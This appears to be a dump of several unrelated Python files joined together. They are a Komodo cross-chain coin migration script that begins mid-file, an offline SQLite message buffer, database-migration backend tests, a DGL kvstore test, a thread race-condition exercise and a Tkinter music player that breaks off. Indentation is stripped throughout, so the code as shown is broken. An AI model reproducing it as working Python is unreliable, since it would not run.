rpcpassword = l.replace('rpcpassword=', '')
elif re.search('rpcport', l):
rpcport = l.replace('rpcport=', '')
if len(rpcport) == 0:
if chain == 'KMD':
rpcport = 7771
else:
print("rpcport not in conf file, exiting")
print("check "+coin_config_file)
exit(1)
return(Proxy("http://%s:%s@127.0.0.1:%d"%(rpcuser, rpcpassword, int(rpcport))))
def print_balance(rpc_connection_source, rpc_connection_destination):
balance_source = rpc_connection_source.getbalance()
balance_destination = rpc_connection_destination.getbalance()
source_chain_name = rpc_connection_source.getinfo()["name"]
destination_chain_name = rpc_connection_destination.getinfo()["name"]
print("Source chain " + source_chain_name + " balance: " + str(balance_source))
print("Destination chain " + destination_chain_name + " balance: " + str(balance_destination) + "\n")
assetChains = []
ccids = []
ID=1
HOME = os.environ['HOME']
try:
with open(HOME + '/StakedNotary/assetchains.json') as file:
assetchains = json.load(file)
except Exception as e:
print(e)
print("Trying alternate location for file")
with open(HOME + '/staked/assetchains.json') as file:
assetchains = json.load(file)
for chain in assetchains:
print(str(ID).rjust(3) + ' | ' + (chain['ac_name']+" ("+chain['ac_cc']+")").ljust(12))
ID+=1
assetChains.append(chain['ac_name'])
ccids.append(chain['ac_cc'])
src_index = selectRangeInt(1,len(assetChains),"Select source chain: ")
src_chain = assetChains[src_index-1]
rpc_connection_sourcechain = def_credentials(src_chain)
rpc_connection_sourcechain1 = def_credentials(src_chain)
rpc_connection_sourcechain2 = def_credentials(src_chain)
ccid=ccids[src_index-1]
assetChains = []
ID=1
for chain in assetchains:
if ccid == chain['ac_cc'] and src_chain != chain['ac_name']:
print(str(ID).rjust(3) + ' | ' + (chain['ac_name']+" ("+chain['ac_cc']+")").ljust(12))
ID+=1
assetChains.append(chain['ac_name'])
if ID != 1:
dest_chain = selectRangeInt(1,len(assetChains),"Select destination chain: ")
else:
print('No other asset chains with the same cc_id to migrate to, exiting')
exit(0)
rpc_connection_destinationchain = def_credentials(assetChains[dest_chain-1])
rpc_connection_destinationchain1 = def_credentials(assetChains[dest_chain-1])
rpc_connection_kmdblockchain = def_credentials('KMD')
migrations_amount = selectRangeInt(1,7778,"How many migrations?: ")
target_migrations = migrations_amount
balance=rpc_connection_sourcechain.getbalance()
max_per_loop=balance/migrations_amount
amount = selectRangeFloat(0,max_per_loop,"Amount of funds to send per migration (max: "+str(max_per_loop)+"): ")
addresses = rpc_connection_destinationchain.listaddressgroupings()
address = addresses[0][0][0]
print('sending to '+address)
BROADCASTED_EXPORT_TXS = 0
CONFIRMED_EXPORT_TXS = 0
CONFIRMED_IMPORT_TXS = 0
BROADCASTED_IMPORT_TXS = 0
IMPORT_TXS_CREATED = 0
IMPORT_TXS_COMPLETED = 0
BRK = []
list_threads = []
print_balance(rpc_connection_sourcechain, rpc_connection_destinationchain)
print("Sending " + str(amount * target_migrations) + " coins from " + rpc_connection_sourcechain.getinfo()["name"] + " chain " +\
"to " + rpc_connection_destinationchain.getinfo()["name"] + " chain\n")
def input_thread(BRK):
input()
BRK.append(None)
def create_export_txs(rpc_connection_source, export_queue, txns_to_send):
while True:
for i in range(txns_to_send):
if BRK: break
raw_transaction = rpc_connection_source.createrawtransaction([], {address: amount})
while True:
try:
export_data = rpc_connection_source.migrate_converttoexport(raw_transaction, rpc_connection_destinationchain.getinfo()["name"])
break
except Exception as e:
print("Src RPC Busy - waiting to convert to export")
time.sleep(10)
break
export_raw = export_data["exportTx"]
export_funded_data = rpc_connection_source.fundrawtransaction(export_raw)
export_funded_transaction = export_funded_data["hex"]
payouts = export_data["payouts"]
signed_hex = rpc_connection_source.signrawtransaction(export_funded_transaction)
while True:
try:
sent_tx = rpc_connection_source.sendrawtransaction(signed_hex["hex"])
break
except Exception as e:
print("Send raw source busy")
time.sleep(10)
break
if len(sent_tx) != 64:
print(signed_hex)
print(sent_tx)
print("Export TX not successfully created")
time.sleep(10)
else:
data_for_queue = {"tx_id": sent_tx, "payouts": payouts, "signed_hex": signed_hex["hex"]}
while True:
try:
export_queue.put(data_for_queue)
break
except:
time.sleep(20)
continue
break
global BROADCASTED_EXPORT_TXS
BROADCASTED_EXPORT_TXS += 1
time.sleep(0.25)
break
def create_import_txs(rpc_connection, queue_with_exports, import_queue):
while True:
data_from_queue = queue_with_exports.get()
while True:
try:
import_tx = rpc_connection.migrate_createimporttransaction(data_from_queue["signed_hex"], data_from_queue["payouts"])
except Exception as e:
print(e)
time.sleep(20)
pass
else:
import_queue.put(import_tx)
global IMPORT_TXS_CREATED
IMPORT_TXS_CREATED += 1
time.sleep(0.2)
break
if IMPORT_TXS_CREATED == BROADCASTED_EXPORT_TXS and IMPORT_TXS_CREATED > 0: break
def migrate_import_txs(rpc_connection, import_txs_queue, migrated_import_txs_queue):
while True:
import_tx = import_txs_queue.get()
while True:
try:
complete_tx = rpc_connection.migrate_completeimporttransaction(import_tx)
except Exception as e:
print(e)
time.sleep(10)
pass
else:
migrated_import_txs_queue.put(complete_tx)
global IMPORT_TXS_COMPLETED
IMPORT_TXS_COMPLETED += 1
time.sleep(0.2)
break
if IMPORT_TXS_COMPLETED == BROADCASTED_EXPORT_TXS and IMPORT_TXS_COMPLETED > 0: break
def broadcast_on_destinationchain(rpc_connection, complete_tx_queue, dest_tx_queue):
while True:
complete_tx = complete_tx_queue.get()
while True:
try:
sent_itx = rpc_connection.sendrawtransaction(complete_tx)
except Exception as e:
print(e)
time.sleep(2.5)
else:
dest_tx_queue.put(sent_itx)
global BROADCASTED_IMPORT_TXS
BROADCASTED_IMPORT_TXS += 1
time.sleep(0.5)
break
if BROADCASTED_IMPORT_TXS == BROADCASTED_EXPORT_TXS and BROADCASTED_IMPORT_TXS > 0: break
def check_if_confirmed_export(rpc_connection, queue_to_check, queue_with_confirmed):
while True:
data_from_queue = queue_to_check.get()
while True:
if int(rpc_connection.gettransaction(data_from_queue["tx_id"])["confirmations"]) > 0:
queue_with_confirmed.put(data_from_queue)
global CONFIRMED_EXPORT_TXS
CONFIRMED_EXPORT_TXS +=1
time.sleep(0.05)
break
else:
time.sleep(20)
if CONFIRMED_EXPORT_TXS == BROADCASTED_EXPORT_TXS and CONFIRMED_EXPORT_TXS > 0: break
def check_if_confirmed_import(rpc_connection, queue_to_check, queue_with_confirmed):
while True:
data_from_queue = queue_to_check.get()
while True:
try:
if int(rpc_connection.getrawtransaction(data_from_queue, 1)["confirmations"]) > 0:
queue_with_confirmed.put(data_from_queue)
global CONFIRMED_IMPORT_TXS
CONFIRMED_IMPORT_TXS += 1
time.sleep(0.25)
break
else:
time.sleep(10)
except Exception as e:
time.sleep(10)
pass
if CONFIRMED_IMPORT_TXS == BROADCASTED_EXPORT_TXS and CONFIRMED_IMPORT_TXS > 0: break
def print_imports():
t0 = time.time()
global IMPORT_TXS_COMPLETED
imports_counter = IMPORT_TXS_COMPLETED
time.sleep(2.5)
while True:
if CONFIRMED_IMPORT_TXS < BROADCASTED_EXPORT_TXS:
t1 = time.time()
if imports_counter == 0:
migrations_per_second = 0
else:
migrations_per_second = (t1 - t0) / imports_counter
if thread_new_txns.isAlive():
print("Press Enter to quit before " + str(target_migrations) + " broadcasted.")
else:
print("Running remaining tx's through the migration routine")
print("Currently running " + str(threading.active_count() - 2) + " Threads")
print("Export transactions broadcasted: " + str(BROADCASTED_EXPORT_TXS) + " Transactions of: " + str(amount))
print("Export transactions confirmed: " + str(CONFIRMED_EXPORT_TXS) + " Queue: " + str(export_tx_queue.qsize()))
print("Import transactions created: " + str(IMPORT_TXS_CREATED) + " Queue: " + str(confirmed_export_queue.qsize()))
print("Import transactions completed on KMD chain: " + str(IMPORT_TXS_COMPLETED) + " Queue: " + str(import_tx_queue.qsize()))
print("Import transactions broadcasted: " + str(BROADCASTED_IMPORT_TXS) + " Queue: " + str(migrated_import_tx_queue.qsize()))
print("Import transactions confirmed: " + str(CONFIRMED_IMPORT_TXS) + " Queue: " + str(broadcasted_on_dest_queue.qsize()))
print(str((t1 - t0) / 60) + " minutes elapsed")
print(str(CONFIRMED_IMPORT_TXS) + " migrations complete")
print(str(CONFIRMED_IMPORT_TXS / (t1 - t0)) + " migrations/second speed\n")
time.sleep(10)
else:
break
def is_finished():
t0 = time.time()
time.sleep(10)
while True:
if CONFIRMED_IMPORT_TXS < BROADCASTED_EXPORT_TXS and BROADCASTED_EXPORT_TXS > 0:
time.sleep(0.5)
else:
t1 = time.time()
print("_Import transactions confirmed: " + str(CONFIRMED_IMPORT_TXS))
print("_Sent " + str(CONFIRMED_IMPORT_TXS * amount) + " coins")
print(str(t1 - t0) + " _seconds elapsed")
print(str(CONFIRMED_IMPORT_TXS) + " _migrations complete")
print(str(CONFIRMED_IMPORT_TXS / (t1 - t0)) + " _migrations/second speed\n")
print_balance(rpc_connection_sourcechain, rpc_connection_destinationchain)
break
# queue of export transactions
export_tx_queue = queue.Queue(maxsize=777)
# queue with confirmed export transactions
confirmed_export_queue = queue.Queue(maxsize=777)
# queue with import transactions
import_tx_queue = queue.Queue()
# queue with complete import transactions
migrated_import_tx_queue = queue.Queue()
# queue with imports broadcasted on destination chain
broadcasted_on_dest_queue = queue.Queue()
# queue with imports confirmed on destination chain
confirmed_on_dest_queue = queue.Queue()
# thread to interupt exports
thread_new_txns = Thread(name = 'service-thread', target=input_thread, args=(BRK,))
list_threads.append(thread_new_txns)
# thread which creating export transactions
thread_export_txs = Thread(name = 'src_exp_create', target=create_export_txs, args=(rpc_connection_sourcechain2, export_tx_queue, target_migrations))
list_threads.append(thread_export_txs)
# thread which waiting for 1 confirmation on the source chain (estabilishing independed rpc proxy for each thread)
thread_wait_export_confirmation = Thread(name = 'src_exp_cnfrm', target=check_if_confirmed_export, args=(rpc_connection_sourcechain1, export_tx_queue, confirmed_export_queue,))
list_threads.append(thread_wait_export_confirmation)
# thread which creating import transactions
thread_import_txs = Thread(name = 'src_imp_create', target=create_import_txs, args=(rpc_connection_sourcechain, confirmed_export_queue, import_tx_queue,))
list_threads.append(thread_import_txs)
# thread which complete import txs on KMD chain
thread_complete_txs = Thread(name = 'KMD_cmplt_imprt', target=migrate_import_txs, args=(rpc_connection_kmdblockchain, import_tx_queue, migrated_import_tx_queue))
list_threads.append(thread_complete_txs)
# thread which trying to broadcast imports on destination chain
thread_broadcast_destination = Thread(name = 'dst_brdcst', target=broadcast_on_destinationchain, args=(rpc_connection_destinationchain, migrated_import_tx_queue, broadcasted_on_dest_queue))
list_threads.append(thread_broadcast_destination)
# thread which waiting for 1 confirmation on destination chain
thread_wait_import_confirmation = Thread(name = 'dst_cnfrm', target=check_if_confirmed_import, args=(rpc_connection_destinationchain1, broadcasted_on_dest_queue, confirmed_on_dest_queue,))
list_threads.append(thread_wait_import_confirmation)
# printer thread
printer_thread = Thread(name = 'printer_thread', target=print_imports)
list_threads.append(printer_thread)
# thread monitoring completion
thread_finished = Thread(name = 'service_exit_thread', target=is_finished)
list_threads.append(thread_finished)
for i in list_threads: i.start()
|
offline_database.py
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------#
# Copyright © 2015-2016 VMware, Inc. All Rights Reserved. #
# #
# Licensed under the BSD 2-Clause License (the “License”); you may not use #
# this file except in compliance with the License. #
# #
# The BSD 2-Clause License #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are met:#
# #
# - Redistributions of source code must retain the above copyright notice, #
# this list of conditions and the following disclaimer. #
# #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in the #
# documentation and/or other materials provided with the distribution. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"#
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE #
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE #
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE #
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR #
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF #
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN #
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) #
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF #
# THE POSSIBILITY OF SUCH DAMAGE. #
# ----------------------------------------------------------------------------#
import logging
import sqlite3
import threading
import time
from liota.dcc_comms.dcc_comms import DCCComms
from liota.dcc_comms.check_connection import checkConnection
log = logging.getLogger(__name__)
class offline_database:
def __init__(self, table_name, comms, conn=None, data_drain_size=1, draining_frequency=0):
"""
:param table_name: table_name in which message will be stored
:param comms: comms instance of DCCComms
:param draining_frequency: frequency with which data will be published after internet connectivity established.
"""
if not isinstance(table_name, basestring):
log.error("Table name should be a string.")
raise TypeError("Table name should be a string.")
if not isinstance(comms, DCCComms):
log.error("DCCComms object is expected.")
raise TypeError("DCCComms object is expected.")
if not isinstance(draining_frequency, float) and not isinstance(draining_frequency, int):
log.error("draining_frequency is expected of float or int type.")
raise TypeError("draining_frequency is expected of float or int type.")
try:
assert draining_frequency>=0
except AssertionError as e:
log.error("draining_frequency can't be negative.")
raise e("draining_frequency can't be negative.")
self.table_name = table_name
if conn is None:
self.internet_conn = checkConnection()
else:
self.internet_conn = conn
self.draining_frequency = draining_frequency
self.data_drain_size = data_drain_size
self.comms = comms
self.flag_conn_open = False
self.draining_in_progress = False
self._offline_db_lock = threading.Lock()
self._create_table()
def _create_table(self):
if self.flag_conn_open is False:
self.conn = sqlite3.connect('storage.db')
try:
with self.conn:
if not self.conn.execute("SELECT name FROM sqlite_master WHERE TYPE='table' AND name= ? ", (self.table_name,)).fetchone():
self.conn.text_factory = str
self.flag_conn_open = True
self.cursor = self.conn.cursor()
self.cursor.execute("CREATE TABLE "+self.table_name+" (Message TEXT)")
self.cursor.close()
del self.cursor
else:
print "Table already there!!!"
except Exception as e:
raise e
finally:
self.flag_conn_open = False
self.conn.close()
def add(self, message):
try:
self.conn = sqlite3.connect('storage.db')
self.flag_conn_open = True
with self.conn:
self.cursor = self.conn.cursor()
print "Adding data to "+ self.table_name
self.cursor.execute("INSERT INTO "+self.table_name+"(Message) VALUES (?);", (message,))
self.cursor.close()
del self.cursor
except sqlite3.OperationalError as e:
raise e
finally:
self.conn.close()
self.flag_conn_open = False
def _drain(self):
self._offline_db_lock.acquire()
self.conn = sqlite3.connect('storage.db')
self.flag_conn_open = True
self.draining_in_progress = True
self.cursor = self.conn.cursor()
self.del_cursor = self.conn.cursor()
data_drained = 0
try:
for row in self.cursor.execute("SELECT Message FROM "+self.table_name):
if self.comms is not None and self.internet_conn.check :
try:
self.comms.send(row[0])
log.info("Data Drain: {}".format(row[0]))
print "Data drained: ",row[0]
data_drained+=1
self.del_cursor.execute("Delete from "+self.table_name+" where rowid IN (Select rowid from "+self.table_name+" limit 1);")
self.conn.commit()
except Exception as e:
raise e
else: #internet connectivity breaks while draining
log.warning("Internet broke while draining")
break
if data_drained==self.data_drain_size: #if some amt. of data drained thread sleeps for specified draining_freqn.
data_drained=0
time.sleep(self.draining_frequency)
except Exception as e:
raise e
log.warning("Internet connectivity broke while draining.")
finally:
self.del_cursor.close()
del self.del_cursor
self.conn.close()
self.flag_conn_open = False
self.draining_in_progress = False
self._offline_db_lock.release()
def start_drain(self):
queueDrain = threading.Thread(target=self._drain)
queueDrain.daemon = True
queueDrain.start()
|
test_backends.py
|
from functools import partial
from tempfile import NamedTemporaryFile
from threading import Thread
import time
from mock import Mock
from mock import call
from mock import patch
import pytest
from yoyo import backends
from yoyo import read_migrations
from yoyo import exceptions
from yoyo.connections import get_backend
from yoyo.tests import get_test_backends
from yoyo.tests import get_test_dburis
from yoyo.tests import with_migrations
class TestTransactionHandling(object):
def test_it_commits(self, backend):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == [("A",)]
def test_it_rolls_back(self, backend):
with pytest.raises(backend.DatabaseError):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
# Invalid SQL to produce an error
backend.execute("INSERT INTO nonexistant values ('A')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == []
def test_it_nests_transactions(self, backend):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
with backend.transaction() as trans:
backend.execute("INSERT INTO yoyo_t values ('B')")
trans.rollback()
with backend.transaction() as trans:
backend.execute("INSERT INTO yoyo_t values ('C')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == [("A",), ("C",)]
def test_backend_detects_transactional_ddl(self, backend):
expected = {
backends.PostgresqlBackend: True,
backends.SQLiteBackend: True,
backends.MySQLBackend: False,
}
if backend.__class__ in expected:
assert backend.has_transactional_ddl is expected[backend.__class__]
def test_non_transactional_ddl_behaviour(self, backend):
"""
DDL queries in MySQL commit the current transaction,
but it still seems to respect a subsequent rollback.
We don't rely on this behaviour, but it's weird and worth having
a test to document how it works and flag up in future should a new
backend do things differently
"""
if backend.has_transactional_ddl:
return
with backend.transaction() as trans:
backend.execute("CREATE TABLE yoyo_a (id INT)") # implicit commit
backend.execute("INSERT INTO yoyo_a VALUES (1)")
backend.execute("CREATE TABLE yoyo_b (id INT)") # implicit commit
backend.execute("INSERT INTO yoyo_b VALUES (1)")
trans.rollback()
count_a = backend.execute("SELECT COUNT(1) FROM yoyo_a").fetchall()[0][
0
]
assert count_a == 1
count_b = backend.execute("SELECT COUNT(1) FROM yoyo_b").fetchall()[0][
0
]
assert count_b == 0
@with_migrations(
a="""
__transactional__ = False
step('CREATE DATABASE yoyo_test_tmp',
'DROP DATABASE yoyo_test_tmp',
)
"""
)
def test_statements_requiring_no_transaction(self, tmpdir):
"""
PostgreSQL will error if certain statements (eg CREATE DATABASE)
are run within a transaction block.
As far as I know this behavior is PostgreSQL specific. We can't run
this test in sqlite or oracle as they do not support CREATE DATABASE.
"""
for backend in get_test_backends(exclude={"sqlite", "oracle"}):
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
backend.rollback_migrations(migrations)
@with_migrations(
a="""
__transactional__ = False
def reopen_db(conn):
import sqlite3
for _, db, filename in conn.execute('PRAGMA database_list'):
if db == 'main':
reconn = sqlite3.connect(filename)
reconn.execute("CREATE TABLE yoyo_test_b (id int)")
break
else:
raise AssertionError("sqlite main database not found")
step('CREATE TABLE yoyo_test_a (id int)')
step(reopen_db)
step('CREATE TABLE yoyo_test_c (id int)')
"""
)
def test_disabling_transactions_in_sqlite(self, tmpdir):
"""
Transactions cause sqlite databases to become locked, preventing
other tools from accessing them:
https://bitbucket.org/ollyc/yoyo/issues/43/run-step-outside-of-transaction
"""
with NamedTemporaryFile() as tmp:
backend = get_backend("sqlite:///" + tmp.name)
backend.apply_migrations(read_migrations(tmpdir))
assert "yoyo_test_a" in backend.list_tables()
assert "yoyo_test_b" in backend.list_tables()
assert "yoyo_test_c" in backend.list_tables()
class TestConcurrency(object):
# How long to lock for: long enough to allow a migration to be loaded and
# started without unduly slowing down the test suite
lock_duration = 0.3
def do_something_with_lock(self, dburi):
with get_backend(dburi).lock():
time.sleep(self.lock_duration)
def skip_if_not_concurrency_safe(self, backend):
if (
"sqlite" in backend.uri.scheme
and backend.uri.database == ":memory:"
):
pytest.skip(
"Concurrency tests not supported for SQLite "
"in-memory databases, which cannot be shared "
"between threads"
)
if backend.driver.threadsafety < 1:
pytest.skip(
"Concurrency tests not supported for "
"non-threadsafe backends"
)
def test_lock(self, dburi):
"""
Test that :meth:`~yoyo.backends.DatabaseBackend.lock`
acquires an exclusive lock
"""
backend = get_backend(dburi)
self.skip_if_not_concurrency_safe(backend)
thread = Thread(target=partial(self.do_something_with_lock, dburi))
t = time.time()
thread.start()
# Give the thread time to acquire the lock, but not enough
# to complete
time.sleep(self.lock_duration * 0.6)
with backend.lock():
delta = time.time() - t
assert delta >= self.lock_duration
thread.join()
def test_lock_times_out(self, dburi):
backend = get_backend(dburi)
self.skip_if_not_concurrency_safe(backend)
thread = Thread(target=partial(self.do_something_with_lock, dburi))
thread.start()
# Give the thread time to acquire the lock, but not enough
# to complete
time.sleep(self.lock_duration * 0.6)
with pytest.raises(exceptions.LockTimeout):
with backend.lock(timeout=0.001):
assert False, "Execution should never reach this point"
thread.join()
class TestInitConnection(object):
class MockBackend(backends.DatabaseBackend):
driver = Mock(DatabaseError=Exception, paramstyle="format")
def list_tables(self):
return []
def connect(self, dburi):
return Mock()
def test_it_calls_init_connection(self):
with patch("yoyo.internalmigrations.upgrade"), patch.object(
self.MockBackend, "init_connection", Mock()
) as mock_init:
backend = self.MockBackend("", "")
connection = backend.connection
assert mock_init.call_args == call(connection)
mock_init.reset_mock()
backend.rollback()
assert mock_init.call_args_list == [call(connection)]
def test_postgresql_backend_sets_search_path(self):
class MockPGBackend(backends.PostgresqlBackend):
driver = Mock(DatabaseError=Exception, paramstyle="format")
schema = "foo"
def connect(self, dburi):
return Mock()
with patch("yoyo.internalmigrations.upgrade"):
backend = MockPGBackend("", "")
backend.rollback()
assert backend.connection.cursor().execute.call_args == call(
"SET search_path TO foo"
)
def test_postgresql_connects_with_schema(self):
dburi = next(iter(get_test_dburis(only={"postgresql"})), None)
if dburi is None:
pytest.skip("PostgreSQL backend not available")
backend = get_backend(dburi)
with backend.transaction():
backend.execute("CREATE SCHEMA foo")
try:
assert get_backend(dburi + "?schema=foo").execute(
"SHOW search_path"
).fetchone() == ("foo",)
finally:
with backend.transaction():
backend.execute("DROP SCHEMA foo CASCADE")
def test_postgresql_list_table_uses_current_schema(self):
dburi = next(iter(get_test_dburis(only={"postgresql"})), None)
if dburi is None:
pytest.skip("PostgreSQL backend not available")
backend = get_backend(dburi)
dbname = backend.uri.database
with backend.transaction():
backend.execute(
"ALTER DATABASE {} SET SEARCH_PATH = custom_schema,public".format(
dbname
)
)
try:
with backend.transaction():
backend.execute("CREATE SCHEMA custom_schema")
backend.execute("CREATE TABLE custom_schema.foo (x int)")
assert "foo" in get_backend(dburi).list_tables()
finally:
with backend.transaction():
backend.execute(
"ALTER DATABASE {} RESET SEARCH_PATH".format(dbname)
)
backend.execute("DROP SCHEMA custom_schema CASCADE")
|
test_kvstore.py
|
import dgl
import argparse
import mxnet as mx
import time
import backend as F
from multiprocessing import Process
ID = []
ID.append(mx.nd.array([0,1], dtype='int64'))
ID.append(mx.nd.array([2,3], dtype='int64'))
ID.append(mx.nd.array([4,5], dtype='int64'))
ID.append(mx.nd.array([6,7], dtype='int64'))
DATA = []
DATA.append(mx.nd.array([[1.,1.,1.,],[1.,1.,1.,]]))
DATA.append(mx.nd.array([[2.,2.,2.,],[2.,2.,2.,]]))
DATA.append(mx.nd.array([[3.,3.,3.,],[3.,3.,3.,]]))
DATA.append(mx.nd.array([[4.,4.,4.,],[4.,4.,4.,]]))
edata_partition_book = {'edata':mx.nd.array([0,0,1,1,2,2,3,3], dtype='int64')}
ndata_partition_book = {'ndata':mx.nd.array([0,0,1,1,2,2,3,3], dtype='int64')}
ndata_g2l = []
edata_g2l = []
ndata_g2l.append({'ndata':mx.nd.array([0,1,0,0,0,0,0,0], dtype='int64')})
ndata_g2l.append({'ndata':mx.nd.array([0,0,0,1,0,0,0,0], dtype='int64')})
ndata_g2l.append({'ndata':mx.nd.array([0,0,0,0,0,1,0,0], dtype='int64')})
ndata_g2l.append({'ndata':mx.nd.array([0,0,0,0,0,0,0,1], dtype='int64')})
edata_g2l.append({'edata':mx.nd.array([0,1,0,0,0,0,0,0], dtype='int64')})
edata_g2l.append({'edata':mx.nd.array([0,0,0,1,0,0,0,0], dtype='int64')})
edata_g2l.append({'edata':mx.nd.array([0,0,0,0,0,1,0,0], dtype='int64')})
edata_g2l.append({'edata':mx.nd.array([0,0,0,0,0,0,0,1], dtype='int64')})
def start_client(flag):
time.sleep(3)
client = dgl.contrib.start_client(ip_config='ip_config.txt',
ndata_partition_book=ndata_partition_book,
edata_partition_book=edata_partition_book,
close_shared_mem=flag)
client.push(name='edata', id_tensor=ID[client.get_id()], data_tensor=DATA[client.get_id()])
client.push(name='ndata', id_tensor=ID[client.get_id()], data_tensor=DATA[client.get_id()])
client.barrier()
tensor_edata = client.pull(name='edata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
tensor_ndata = client.pull(name='ndata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
target_tensor = mx.nd.array([[1., 1., 1.],
[1., 1., 1.],
[2., 2., 2.],
[2., 2., 2.],
[3., 3., 3.],
[3., 3., 3.],
[4., 4., 4.],
[4., 4., 4.]])
assert F.array_equal(tensor_edata, target_tensor)
assert F.array_equal(tensor_ndata, target_tensor)
client.barrier()
if client.get_id() == 0:
client.shut_down()
def start_server(server_id, num_client):
dgl.contrib.start_server(
server_id=server_id,
ip_config='ip_config.txt',
num_client=num_client,
ndata={'ndata':mx.nd.array([[0.,0.,0.],[0.,0.,0.]])},
edata={'edata':mx.nd.array([[0.,0.,0.],[0.,0.,0.]])},
ndata_g2l=ndata_g2l[server_id],
edata_g2l=edata_g2l[server_id])
if __name__ == '__main__':
# server process
p0 = Process(target=start_server, args=(0, 4))
p1 = Process(target=start_server, args=(1, 4))
p2 = Process(target=start_server, args=(2, 4))
p3 = Process(target=start_server, args=(3, 4))
# client process
p4 = Process(target=start_client, args=(True,))
p5 = Process(target=start_client, args=(True,))
p6 = Process(target=start_client, args=(False,))
p7 = Process(target=start_client, args=(False,))
# start server process
p0.start()
p1.start()
p2.start()
p3.start()
# start client process
p4.start()
p5.start()
p6.start()
p7.start()
p0.join()
p1.join()
p2.join()
p3.join()
p4.join()
p5.join()
p6.join()
p7.join()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
import time
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for a in range(1,1000000):
i = i + 1
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for a in range(1,1000000):
i = i - 1
def main():
# TODO: Something is missing here (needed to print i)
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
#time.sleep(1)
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
basic.py
|
import os
import threading
import time
from tkinter import *
import tkinter.messagebox
from pygame import mixer
from tkinter import filedialog
from mutagen.mp3 import MP3
from ttkthemes import themed_tk as tk
from tkinter import ttk
root = tk.ThemedTk()
root.get_themes()
root.set_theme("radiance")
statusbar = Label(root, text="This is a Music Player: Rhythm", relief=SUNKEN,font="Times 10 bold")
statusbar.pack(side=BOTTOM, fill=X)
menubar = Menu(root)
root.config(menu=menubar)
subMenu = Menu(menubar,tearoff=0)
playlist =[]
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
def add_to_playlist(filename):
filename = os.path.basename(filename)
index = 0
playlistbox.insert(index,filename)
playlist.insert(index, filename_path)
index += 1
menubar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
def about_us():
tkinter.messagebox.showinfo('About Rhythm', 'This is a music player build using Python Tkinter')
subMenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About Us",command=about_us)
mixer.init()
root.title("Rhythm")
root.iconbitmap(r'images/music.ico')
leftframe = Frame(root)
leftframe.pack(side = LEFT,padx=30,pady=30)
playlistbox = Listbox(leftframe)
playlistbox.pack()
addBtn = ttk.Button(leftframe, text="+ Add", command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
playlistbox.delete(selected_song)
playlist.pop(selected_song)
delBtn = ttk.Button(leftframe, text="- Del",command = del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack(pady=30)
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = Label(topframe, text='Total length = --:--')
lengthlabel.pack(pady=10)
currenttimelabel = Label(topframe, text='Current Time : --:--', relief=GROOVE)
currenttimelabel.pack()
def show_details(play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
# div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
def start_count(t):
global paused
# mixer.music.get_busy(): - Returns FALSE when we press the stop button (music stop playing)
# Continue - Ignores all of the statements below it. We check if music is paused or not.
current_time = 0
while current_time <= t and mixer.music.get_busy():
if paused:
continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
time.sleep(1)
current_time += 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
